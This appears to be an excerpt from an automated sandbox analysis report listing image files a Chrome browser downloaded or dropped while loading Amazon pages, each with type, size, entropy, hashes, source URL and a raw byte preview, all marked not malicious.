                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                      MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                      SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                      SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                      SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://aax-eu.amazon-adsystem.com/e/loi/imp?b=JAdwMenK-Lr6goco_zSS1gcAAAGRdjLkNgMAAAH2AQBvbm9fdHhuX2JpZDMgICBvbm9fdHhuX2ltcDEgICB-RDUN
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 174x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):18517
                                                                                                                                                                                                                                                                      Entropy (8bit):7.970801562471845
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:9Ofyln+XpCdA+gqj+PfFdXA8oR9rjE64kVoSVnA6vbLFd0:gUni+gqyfFdIPhDPA
                                                                                                                                                                                                                                                                      MD5:8CBF938E76DC4152352E58A8C2FB9F34
                                                                                                                                                                                                                                                                      SHA1:1628EDF3A3930355FEE8BEC16461CA2EB26593A9
                                                                                                                                                                                                                                                                      SHA-256:44F88D64142D8295BEE2BCC0F3D3024F5567C7ABB846F433F654A9729F053FC8
                                                                                                                                                                                                                                                                      SHA-512:48FD7DD71094148F65072ABC8D4BF754A91C861D0A9519B1F362282AE7F0742BE5AE332471E2A1C8797A56F95F7B597B4F5471A7F212938678724818C6A43833
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."...............................................................!..1."A..#2Qrs..35aq..Bb..4R.....$Su..6t.....%7CDcv......................................................!1.A.3Bq."4Q..2Da....#.............?.r..Q]..gE.K..V..k.1W.....3..0tEE..D...... 7E.UU..o4.,q..;.EQ.$..WY.l9. aH....F....v..D..j*....3.hO.WD..>....2.."*5%.].D.$..g...SOQ4...h..SI.i...J.rX....h.D...E.....2..(..+.3O*...(F..`..lV..O_...;O6uUX.SI...R.~..S.d......7j#8H..Fm...........p.......~SPk.....i...9.Z5e....VB.=.j51...........Y=.../.e.5..f..RY...T.. o*.q?E..R..0..i..f,U...7.q....$.(.....I.P.SAM/....l.QyND..e2/.%...,..l....Eb}.J..~:tx..........e._..lqL.....0..q....vm....~...#..>.J.a.*|X..E...T.E..........l>).q..>W.k.ud5Z......{j.M.lv.W.b..~...Q.U.Y].@...........dp.;VI.1......o.....D...6....A.1...1..b..&9..7... .......$y.X.=....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3984
                                                                                                                                                                                                                                                                      Entropy (8bit):7.859017968581684
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:i+jdnll+5bS3KpD88SGD7DKAzyKpnxZ8T0QB6K3i7t:iORlO26fXD/XBxZGK7t
                                                                                                                                                                                                                                                                      MD5:BB6E0623798D3DA7E318EBD098305FF9
                                                                                                                                                                                                                                                                      SHA1:FE805F5755F8235DC39443407278BB8F229BB4F6
                                                                                                                                                                                                                                                                      SHA-256:64C470570EFC7370C6B4A2665330DD1EA0F68B15D4F126940EAB1542ED19D74B
                                                                                                                                                                                                                                                                      SHA-512:8006CD8B4B248C2E44E15B914573D514BEB429BBD45968341411FD7C0B0EBB5DE943E8C68F583AEB062799C3AA2B51636E023DB74D0E84D7EBAC71B4BBFF859E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Cleaning_186x116_2X_en_AE._SY116_CB566996700_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF...........................................)......)$,$!$,$A3--3AK?<?K[QQ[rlr................................)......)$,$!$,$A3--3AK?<?K[QQ[rlr.........t...."..........5....................................................................<.\...f.\......N.Z.No.....<.).eY...H......[}..K..@.v}5......8.6.{.}.+.....%.........J..s%!...F)...\ hV".......Jf.......i%.I6..&..d0:_9h...9n..h.....tq.0....k"V..e...k..l..U...RJ..<.G.0.H........z.............#EP.4.*..z$.-..\.W~..=y..........D....p...C.[a..C..$......[g..3..!.|.......\..X...J[..F....D.T.Sh.C...g3[+O&..m~.....j....'H... h....V..vP&4v.cV.%SJ....o.0....8....?..........................!1.AQ..."02Ta.. B..#4RS..3bcqs.............?...:...M..!..rX.W.9..?...9..?...)..?...)..?..e.d..zv_...5...?..f.x..^.....zvo...5..~.?..f.d..zro.O..%.t..D.H.|cz............9....y.O..........n58".5t*.V.......{...P..x.FEj....F..=.....M...<+A..}....J......j...W.Z..#x.H.b5.}.._G..}....RI$..#.U.t`+O.#..4..I,.K..J.N..by.....i./m.-
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):2974
                                                                                                                                                                                                                                                                      Entropy (8bit):7.783838065415687
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0r6xxKRTce7RbbYxl2D4y4llhyitJ4qoKo3eYs0+G1lEtbbp8MxQjIzz:TJARTcAbd2/hBkJJeY/LlEtbF8MxQsP
                                                                                                                                                                                                                                                                      MD5:7F46081DE151EF8F9A7C6BB270425932
                                                                                                                                                                                                                                                                      SHA1:5FAA281FF0ACE8BC9F979DF91CAA898C9F808FA4
                                                                                                                                                                                                                                                                      SHA-256:B70C6DCC5355E0EC0DA60CA116E88F5A8E6EED57D1D2B430812155C1B27698D4
                                                                                                                                                                                                                                                                      SHA-512:E3840AA124C73CF3FE708D4A228CD2A7FB9AA5AB5A1210CED188BE42540409E62D36CD22E14A8FABD88954E23007746021FE259948DC1F4B39B3A72051D11922
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-0zvf9_372x232_ae-en._SY116_CB643136714_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!1.."AQ..2.BRaq....#3Sbcr$C.D.........................................................?..R..R..R..R..R.D......I=...U5..k.m%xt...o[.c...1.W.Q..Dn...{.T."......7..#hiZ...N.....~zIk..~.......K..,..].....q'?(.....it..[{.p..0..<d.H......R..R..R..R..R..R..R.......".gb..Te.....I.UW.fi.f/{..k16?.e..D...v..;2h./+....0....&..ms.....ys<...m(...Z.$.?.G..$.z.N}._..|.~...U..%.I.5.......t....v..h=zf.......m..~..1....z?....o.c.Wi..2.T..$..'-.....:... ..T.:....jCM..-,..^.._GE2.?.p.55.T.*!JR.JR.JR.JR.JR.JR.X.f.qey.....R2.u .0k%P.......-..:s2..d.Qo.1A...d..E.....82C.e....(.*8.....lP"....}p.......cXH....(.to..>a.......V..g.&H.OR.... ~.........+.`.."y..L(..C...`...Mx..5hf......y..:?]......dj.2.:.|.....67zm..L.H#dY..&0.tI.)$,..$H..NE{.k9.9.....2|Q
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:PNG image data, 13 x 25, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):538
                                                                                                                                                                                                                                                                      Entropy (8bit):7.363900406422438
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:12:6v/7r/6TBLr8CzfiF2PuKoSpH/geL6Ou4zlWkqMlMQn9inLjj5N:i/6FLlzu8kSdg3GNqMlGr5N
                                                                                                                                                                                                                                                                      MD5:3920E1FFC5AB160D1D7F18D8D6303633
                                                                                                                                                                                                                                                                      SHA1:53390E776D482DB9E85814A752276F517523724C
                                                                                                                                                                                                                                                                      SHA-256:3F8C75CC2824A1CE825FF2623763046C497B7D06587C14A07FD775F7506BCDA5
                                                                                                                                                                                                                                                                      SHA-512:5F368C2EFCA94B7021CC693CE95C9A598EEAAFF83072E2D14FF6A6EFE272A07B9301536237EE263E398D87CBE1E72879D11CC6EB443211C99118FB88E85CF35C
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/G/01/ad-feedback/info_icon_1Xsprite.png
                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...................pHYs.................tIME.......}.......bKGD..............IDAT8...n.0.E.V....J...@..........f&...'@.[.202..d...$*[:"..Vv..Z.z..N.....V.q6....P.X,.r.,;E.....L.S..#.c..y.=.'..h.).....!.....`.........BR....#.)PdP... ....4............:.f.Z.....4...A..<..y.....N.....,..\.!.L..v...1]...d...t....*i..5.A....(.......O,..E.o...RM.....h4..j.*..JU.\/t..j/P.$........z=...C..&y...z-.9b..*!B..(...=U...B.J..M..,!n..............!u...x+.u.B'....=...j..O..{.E.*~{...j...?......J.T....IEND.B`.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1], baseline, precision 8, 640x360, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):36717
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9642146220804095
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:PiF7TNlLVcpzaMkgB8/m+Hgdvxkb0Xas8qboi7/ZRBlmimKBLh0x:PSTNtVA9kgB8/VgDTXtZsiTBMiDyx
                                                                                                                                                                                                                                                                      MD5:7A66912E9842139E54A2C42DC16599FB
                                                                                                                                                                                                                                                                      SHA1:0ACBB180B49D8F67E8D5F453569D90E8ACE43EA2
                                                                                                                                                                                                                                                                      SHA-256:E82D4405C03A83A66B50121DEDCE474A6EDCC0727D7C207AA807E228C81B279F
                                                                                                                                                                                                                                                                      SHA-512:83755D93337C510D1AAAF919A0D7D75ADA5FDFB7A57D084F66914F8A08B9875B1D04A210780CE6C1686B7A5EDD7D0C1BDE0394B5A8E8258FDD2904340569811C
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/S/al-eu-726f4d26-7fdb/ef60c95b-8d7d-400d-9723-39a3458ba35a.mp4/r/THUMBNAIL_360P_FRAME_3_CAPTURE_2.JPG
                                                                                                                                                                                                                                                                      Preview:......JFIF.............JExif..II*.......i.........................,...............Version 1.0.0..........................................%...#... ,!#&')*)..-1-(0%))(...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......h...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(p.>..^.r#...{.u...R9..9..^k}.HK.1....z0..:}o\....\.!#w.y..4...W.M#..Y.'..E..2.G........y9.s.).X.L.6......`.....+;..T'.S.]...*...y.|.?.O.VQ......*.......R.7.R2.M..t.{[...2.T-n..Fj...8..g;5cH.u.2L.{..A{uj.g....W)...........3\...w=/K.c.X..L.y....+.t..0I..r.Xr.......J...hZ.|.......R.+..4
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):1044
                                                                                                                                                                                                                                                                      Entropy (8bit):5.317557604776751
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:24:tVgL6OR0UH8Z0o4e+orenR0UH8Z0o4uPuTwFlnJHxlLS2xke:gdSUcprenSUcXFlnJHfS2xke
                                                                                                                                                                                                                                                                      MD5:A6C4BEE9F3055C3D8ACB06E6C972C3A8
                                                                                                                                                                                                                                                                      SHA1:69A03366483ED90F268D806FA6B87A3C3E94C540
                                                                                                                                                                                                                                                                      SHA-256:0BAD480FC8B650C5EDDC4CB8CEBC211529E90853CB36C30D21929982726CCC1C
                                                                                                                                                                                                                                                                      SHA-512:2507A279FD1F91F14942267BA7317DE2D08A3EFA7959DAEC6307E67A33A73FADC980853CC5C2F7FA0181977D04169499A7CA98697A02702D14902626D4C5C636
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:<svg version="1.1" xmlns="http://www.w3.org/2000/svg" focusable="false" aria-hidden="true" viewBox="0 0 19 19" shape-rendering="geometricPrecision"><path d="M9.5,1.325L12.104,6.581L17.922,7.423L13.711,11.511L14.706,17.286L9.5,14.56L4.293,17.286L5.288,11.511L1.077,7.423L6.895,6.581L9.5,1.325Z" style="fill:white"></path><path d="M9.49,1.345L9.49,14.565L4.293,17.286L5.288,11.511L1.077,7.423L6.895,6.581L9.49,1.345Z" style="fill:url(#_starGradient_5pm7gjqod)"></path><path d="M9.5,1.325L12.104,6.581L17.922,7.423L13.711,11.511L14.706,17.286L9.5,14.56L4.293,17.286L5.288,11.511L1.077,7.423L6.895,6.581L9.5,1.325Z" style="fill:none;stroke:rgb(162,106,0);stroke-width:1"></path><defs><linearGradient id="_starGradient_5pm7gjqod" x1="0" y1="0" x2="1" y2="0" gradientUnits="userSpaceOnUse" gradientTransform="matrix(7.07124e-16,11.5482,-11.5482,7.07124e-16,9.4995,5.53952)"><stop offset="0" style="stop-color:rgb(255,206,0);stop-opacity:1"></stop><stop offset="1" style="stop-color:rgb(255,167,0);stop-opac
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4046
                                                                                                                                                                                                                                                                      Entropy (8bit):7.876843791880682
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:aHs1GuI5RN41xFqdXUiymGr1DNY9EuuI7YoMLwixfpfsZ:EzqFqdL+bYuPAYLwupfM
                                                                                                                                                                                                                                                                      MD5:AC8163C28E70F8413809930878B747DF
                                                                                                                                                                                                                                                                      SHA1:BF117014E148980C423AC7847836DCF892DD499F
                                                                                                                                                                                                                                                                      SHA-256:C05C26B2EF0531A7C615F0306A3F42496CAEBD4C45609BCAA7FAE8CD7EFD70B7
                                                                                                                                                                                                                                                                      SHA-512:9D30B52900D14AF909BCE39808A35A0BFA922A7208CB538A18EA761892CC1D70FF1A43E65A74B83152C80FDE935CFCD76291F3105CEE8073153F25BE75233C87
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:........................................................#"""#''''''''''..................................................!! !!''''''''''..........Adobe.d...........t....".......................................................................................!.1."A.2Qq..a#3BUs....$DR....%456bct..............................!1.A.."Qa.23BTq.....4#rs..............?..Q.l.H""...." ...""...." ...""...." ?..Q.l.H"".....|Y.\..-..u}....>-.z;wl#8.U..?......^.CM$..@.z.=......,...X......&u.um&...Z.`..M.x..I.s7y.C..Z..W..B....g.t.....es..../p8....7.u....:CZ..%.. 3..;.p.-.........OT.....,<.%.R. ....r..%....).W*..Yr.L.+..#....7c|...#....z.|.......hg.s.uH.O. 9.o.o1h..*..mh.G......2V]|.5.NW....t..../....sS<....ah.T.sM^.......mC....H.#..Q3.0.{KenF.p.*.........UV...h%...{.Z=.p2.....y...[m.ONj(X$.....#..>...J.f...[..>W..._..l..`....d|..M^.....5(......g....C.l..-U.................#MU.AMN..V..c1....).....8.\...o....z..n........8....v....V.|.|..I..T......m.-...0{,...Zj.'B.#
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1x1, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):285
                                                                                                                                                                                                                                                                      Entropy (8bit):3.992477276923708
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:6:7hHx7qC0o26Z+aW6Hri/aliltjDtqRXhP/lYYms9:7vTtRWPtsh/lz
                                                                                                                                                                                                                                                                      MD5:B1DF542B3846358E48A00920727A87EB
                                                                                                                                                                                                                                                                      SHA1:B3E8EE8554DA24238553747F8B2656739AD00FFD
                                                                                                                                                                                                                                                                      SHA-256:733E9DF98B6072B548E0D75DDAE41F62B4EB20996D3C06588B78D9963F57DB94
                                                                                                                                                                                                                                                                      SHA-512:3281B4C63BBADB693CC73281197675FCC8FBCB0671DE59C6F525C054C19EF274EC6738E872559FB077758406C7982E478C3B9F6D3C30A73DAF0E1716220C94F2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/G/01/msa/vowels/metrics._STID528255-1724264951010_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF.............C..............................................!........."$".$.......C............................................................................"............................................................................................................?...$..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 263x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):28380
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9784362196622345
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:IHldih5yIBdp6RpRWOpD6MaLa3fEYIO293YQJFE/FkbshrVQKOPE20H6ieodrhWC:IFcR+r3/3HIOzrLy+sodo4pGtY
                                                                                                                                                                                                                                                                      MD5:87A49E3446408AA4D0E1155F2D4F6188
                                                                                                                                                                                                                                                                      SHA1:088B989206803505B2BDBD2CD17066206C89E6BC
                                                                                                                                                                                                                                                                      SHA-256:1F8BFBE30CEF9E4E7D04F031C406BF066A4D08550DCABBEBEC4F8441C6FC9EEA
                                                                                                                                                                                                                                                                      SHA-512:87A5675292EE5C75C6BFACFE53A8441A136983CB8D9069F2B2E9AB0CDAFBA3DA18DAD83FFA20D19D6C797B5436C3E805A0579DDE48A06B3C2C62384880707585
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/81nJ65H0MsL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........5..................................................................[.>.OE7F.h..cV...z,..i.c'v.....-...M...!. Zp`.........=./b.z....X..'.!...\X.;../w..#.y.q..C..h....n..,.}.qL..D.%B...h.@....0.....|".[%..wF.d.K......Z...4x...[.....`.N.G* .}.X..?6.h[.......kE...gv$@{^..M^9!tz..U...x..9.I~.\!...k.....)....)....,..-H.2J.......Y.&....V?..j......ik.}.s0V. .Z.f....u......^gcsT.M-...2.....U1^Tu.......W%5w...~.m...F.....^.;....J.%.....k.2.(._......z/.-`.:....=hRw*7@...7.......pW.\=[)..../*....-...a>."..1...'$c..b....s.z..d.,.A...6...X.T..... .Q..Sn.b.\D.]......g.p.c....ny:..H...n.\........f.(.ZX....]5...'.(...\I=..t.!.'..l.....".OM.N...;8VTv5.S[...(..U.p...\.n...0...9}....t.=.aD...x....;tv..:...o.Y...w.sX.".n...@.6x.Z....Y...9.......ak.....B.I....o........K...NO.*.}..XvmH....|.a
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):34824
                                                                                                                                                                                                                                                                      Entropy (8bit):7.943271633446015
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:VuPrScB3FO+CXYsHO+tJzzdemh68lpICZ:SFOhYQtRzd9lpICZ
                                                                                                                                                                                                                                                                      MD5:2841C3468407AD7E0AC973D7E51894DB
                                                                                                                                                                                                                                                                      SHA1:83C4670EC53B6F756FF3FE0FF498C78C507041D2
                                                                                                                                                                                                                                                                      SHA-256:984D6D320E61F26055B9961268C6B38E975C04C5BB310D6ECEDD5CB27AD1E176
                                                                                                                                                                                                                                                                      SHA-512:DFD606DF2F4F3A819825639D7426B70886D9D15F4C651986BDEB83E49B23A03CF60543CFBAA6E530BBE20AD24C7B96A3C3463F8508C5BA7A395CB5C68C062689
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C............................................................................"...........................................J..............................!."1.#2AQ..q..$BRa..%3...CSs...&(49DEVb.....................................F.........................!1.A..Q.."aq.2.......$3BRr..#Cb....%..4Sc..............?..C...1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....0(.H..fK."".D..PQT.."...\...x.e.Su....zB7.4..U.".../.U.y.7..kr.....I.y......n{/.....Z.J.M.E.....mk._TjQ6.-.u:...h.SP.%... ..KL..<.....s..8..I'.9.@..8[..e..a[`i...e...ZT...L.......{c..........H..*..J..i.A.N..Mb#.P..$gJ|.r...-.t..c:.a..R.d.c..C.........T%........_
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):33740
                                                                                                                                                                                                                                                                      Entropy (8bit):7.930209971614945
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:vGhGWmyLy0diKyZjUYc/1ZChv0aM33sj7C8NlQPvY0WTg642yfWlf:O2I1ZyO1ZChvM33UC8jQPA0WRykf
                                                                                                                                                                                                                                                                      MD5:BE9A1506DEACD39058752C85F0223EA1
                                                                                                                                                                                                                                                                      SHA1:D3B4024E2083059455EFD3A1D8E64CABAF09D0E1
                                                                                                                                                                                                                                                                      SHA-256:2CDFB77697362FA900DD318F22E6711B1F94994A72D54560755BE6BF0004541E
                                                                                                                                                                                                                                                                      SHA-512:7B6769A14BC6047B6B5EF634344A0898A03940B57D62B6F8241757F44F046E295D1CFAFAFF07B691E02B2F837458403E3EFD956F5A5B7B57D1B3BD675BB906B1
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_TCEE_Audio_400x400_EN._CB567012733_.jpg
                                                                                                                                                                                                                                                                      Preview:.............................................................................................................................................2....Adobe.d............................................................................................................!1..AQ."a..#2BVq......Rbr.38.....$6CScsu....%Dv......&Fdt....4TW................................!1"AQRaq.....2........BSr..#b....3C.$4..5............?.......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(...?........P..@(......P..@(...8$....u&..^.*E..T[X}..:...1........~+.*2k..]...3.ex.....]...v..T.K.K....e..........L3..f...w..Z...e.8...Xwn...T...m..].5K...l......?......o.zT.A}..-;.m..H.....$.;.,}%..~..(.....J..i{.f.E0.{.....'....~...?..1..........;..\..h..a..o....V........@.....W.e...j.1qh..../....[....R......~O....W.?....>g|.O|^......2@.v.C?..+...|.[.%.'.jZ3.|Mz.p.rn[.....-...V~..i..f...J.2.*T^...^..z'A.2.../.?o.z.Q../2>S.......x.ux..$._.WO.F..q.WD%.*v......V.R..f.W,N..3.U.....Z./.i
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):11207
                                                                                                                                                                                                                                                                      Entropy (8bit):7.85182301449181
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:wCpWgKhy/lay9rFgAJRvghicTy1opdSemlIMO6cDKpZ:wCHKh4EMSKOhiV+uD26cDK/
                                                                                                                                                                                                                                                                      MD5:1642785A5709D75B419834DF328159C9
                                                                                                                                                                                                                                                                      SHA1:C3910FF9B544AF78467587E39988FEDB4197A4D8
                                                                                                                                                                                                                                                                      SHA-256:282E2047F3937D29D487AA0973F9022552AC09656EFC81A54D0475AA13CB00C0
                                                                                                                                                                                                                                                                      SHA-512:75A725885CD852661F6BB842DBAA0792B2D1328CB6CE0FED7E6AF4DE6980411141BB71999429C74CDAF9CDD9F8009EBFA35D93C0F8D06B4EDD0E695DD6AF8FCC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................,........................................................................................................}.l./L..Q.'..l..7.................<...9..g5.w.1....4...YF*V......I..........................q....23.l$...g.-..6...N...q:.......N...m...................N..z)....S.....jr6..3.fn..'`.....uL.zy^.[.M..Y...r....v..e.dyn^.......]WG=...........o.|(..p=.R..F6&n!.N..3.;H.v.>...|.y.TU~...E:q.V..W..Q......|.....I..n...b..Y....E..X........... r:.S.7]g...^X....~.9.wL.vs..%_.E.1]....q......&..`....<l......(..o{a.........U....?.}...xq..................W..=....n...v.X.7J.fB.J.9.j.Z...5...P.Q8..k%c....f&.C.F...0..P.....2L.......}..U....u...............'.N...1.H.H.Qh.n...+e..........#.fyT..V.{.X.9xU]....U..3x..V........._<7....4Z.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/7yltxlHh/:/+/
